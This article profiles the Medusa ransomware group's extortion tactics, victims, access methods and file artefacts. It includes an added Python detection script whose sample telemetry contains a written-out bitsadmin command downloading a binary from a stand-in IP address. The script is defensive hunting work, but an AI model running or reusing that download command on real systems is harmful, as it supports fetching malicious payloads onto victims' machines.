The Medusa ransomware group has been increasing its activities and has implemented new strategies to enhance the success rate of its extortion efforts. This article provides an overview of the group’s operations, including their use of a leak site and a Telegram channel to share stolen data, as well as their tactics for negotiating ransom payments.
Description
According to Palo Alto’s Unit 42 threat intelligence group, the Medusa ransomware-as-a-service operation began in late 2022 and has recently launched a leak site and a Telegram channel [7]. These platforms are used to share stolen data and offer victims the option to negotiate a lower ransom or pay for a timer extension before the data is leaked. Medusa also provides victims with payment extension schemes and an expanded range of options once their data is first posted on the dedicated leak site [6]. The exact fees charged to victims are negotiated individually [6].
Medusa gained notoriety after a ransomware attack on the Minneapolis Public School District in 2023 [6]. They have recently added promotional videos to their blog [6], showcasing stolen files and indicating a focus on increasing media coverage [6]. Medusa is using other communication channels [6], such as a public Telegram channel [2] [4] [5] [6], to publicize and release stolen data [6]. However, it is unclear if the channel’s owner is affiliated with the group [6].
The Medusa ransomware gang has targeted 74 organizations in 2023, including healthcare entities and not-for-profit organizations [3]. They operate through a dark web leak site [3], where they threaten to publish stolen information unless a ransom is paid [3]. The group offers three options to victims: pay a smaller amount to extend the ransom deadline [3], pay the full amount to have the data deleted [3], or download the data themselves [3] [6]. Medusa has targeted various sectors [3], with tech companies [3], education [3], and manufacturing being the most common [3]. The group has also targeted organizations in healthcare [3], hospitality [3], media [3] [4] [6], insurance [3], mining [3], and more. While the majority of victims are from the US [3], UK [3] [4], and France [3], smaller countries like Bolivia [3], Portugal [3], and Serbia have also been impacted [3].
Medusa employs various techniques to gain access to victim networks [3], including exploiting vulnerabilities and using access brokers [3]. They have been observed using unique tactics [3], such as uploading a web shell to a previously exploited Microsoft Exchange Server and using PowerShell to run a bitsadmin transfer [3]. The Medusa ransomware binary uses RSA asymmetric encryption and renames encrypted files with the extension medusa [3]. The group leaves a document called !!readmemedusa!!.txt on affected machines [3]. Medusa is considered a significant threat actor in the ransomware landscape [3], showcasing complex propagation methods and adeptly avoiding detection through living-off-the-land techniques [3].
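As an added illustration (not code from the article or from any of its cited sources), the Python below turns the three observable artefacts named above, PowerShell launching a bitsadmin transfer, files renamed with the medusa extension and the !!readmemedusa!!.txt note, into simple per-host triage checks run over constructed sample telemetry; the event field names, hostnames, URL and paths are assumptions for the example.

```python
import re
from pathlib import PureWindowsPath

# Indicators quoted from the article; hunting starting points, not a full signature set.
RANSOM_NOTE_NAME = "!!readmemedusa!!.txt"
ENCRYPTED_EXTENSION = ".medusa"

# Sysmon-style process-creation events constructed for this example (not real
# telemetry). Only the first is the article's pattern: PowerShell running bitsadmin.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "powershell.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer upd /download /priority high "
                "http://203.0.113.7/u.bin C:\\Users\\Public\\u.bin"},
    {"host": "ws02", "parent": "cmd.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /list"},
]

# Constructed per-host file listings; ws01 carries the post-encryption artefacts
# the article names (renamed files plus the ransom note), ws03 is clean.
SAMPLE_FILES = {
    "ws01": ["C:\\Users\\Public\\u.bin", "C:\\Data\\q1.xlsx.medusa",
             "C:\\Data\\!!readmemedusa!!.txt"],
    "ws03": ["C:\\Users\\alice\\notes.txt"],
}

# A /transfer job whose source is a URL or UNC path.
_TRANSFER_RE = re.compile(r"/transfer\b.*(https?://|\\\\)", re.IGNORECASE)
def is_scripted_bits_transfer(event: dict) -> bool:
    """bitsadmin download job spawned by PowerShell; '/list' and similar are ignored."""
    return (event["image"].lower() == "bitsadmin.exe"
            and event["parent"].lower() == "powershell.exe"
            and _TRANSFER_RE.search(event["cmdline"]) is not None)

def encryption_artefacts(paths: list) -> dict:
    """Count renamed files and ransom notes in one host's file listing."""
    names = [PureWindowsPath(p).name.lower() for p in paths]
    return {"encrypted": sum(n.endswith(ENCRYPTED_EXTENSION) for n in names),
            "notes": sum(n == RANSOM_NOTE_NAME for n in names)}

def triage(events: list, files: dict) -> dict:
    """Per-host report; a host showing both findings is the one to isolate first."""
    report = {}
    for ev in events:
        if is_scripted_bits_transfer(ev):
            report.setdefault(ev["host"], {"bits_download": 0})["bits_download"] += 1
    for host, paths in files.items():
        art = encryption_artefacts(paths)
        if art["encrypted"] or art["notes"]:
            report.setdefault(host, {"bits_download": 0}).update(art)
    return report
```

The process check fires only on transfer jobs with a remote source, so routine bitsadmin administration stays quiet; the file check is a starting point for scoping which hosts were already encrypted.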
In 2023, the Medusa ransomware group compromised multiple school districts and exposed sensitive information about students [1]. They use initial access brokers (IABs) to gain network access [1], which has proven to be lucrative for them [1]. Medusa also employs double ransoms [1], where they demand one ransom to decrypt encrypted data and another to prevent the leaking of stolen data [1] [2]. The emergence of Medusa in late 2022 and its activities in 2023 have marked a significant development in the ransomware landscape [1]. They utilize complex propagation methods [1], exploit system vulnerabilities [1] [3] [7], and leverage IABs while avoiding detection through living-off-the-land techniques [1]. Medusa’s indiscriminate targeting of 74 organizations across various industries highlights the universal threat posed by ransomware actors [1] [2].
Conclusion
The Medusa ransomware group’s activities have had significant impacts on numerous organizations, particularly in the healthcare, education [3], and manufacturing sectors [3]. Their use of sophisticated techniques and their ability to evade detection pose a serious threat to cybersecurity. Mitigating this threat requires a comprehensive approach that includes vulnerability management, network monitoring, and employee education. The emergence of Medusa and their increasing activities underscore the need for continued vigilance and proactive measures to protect against ransomware attacks.
References
[1] https://flyytech.com/2024/01/13/medusa-group-steps-up-ransomware-activities/
[2] https://www.csoonline.com/article/1290677/medusa-group-steps-up-ransomware-activities.html
[3] https://www.cyberdaily.au/security/10021-more-monster-than-myth-unpacking-the-medusa-ransomware-operation
[4] https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html
[5] https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
[6] https://www.itpro.com/security/ransomware/ransomware-victims-are-being-offered-payment-extension-plans-as-groups-ratchet-up-pressure
[7] https://www.databreachtoday.com/ransomware-trends-medusa-akira-rage-tortilla-disrupted-a-24088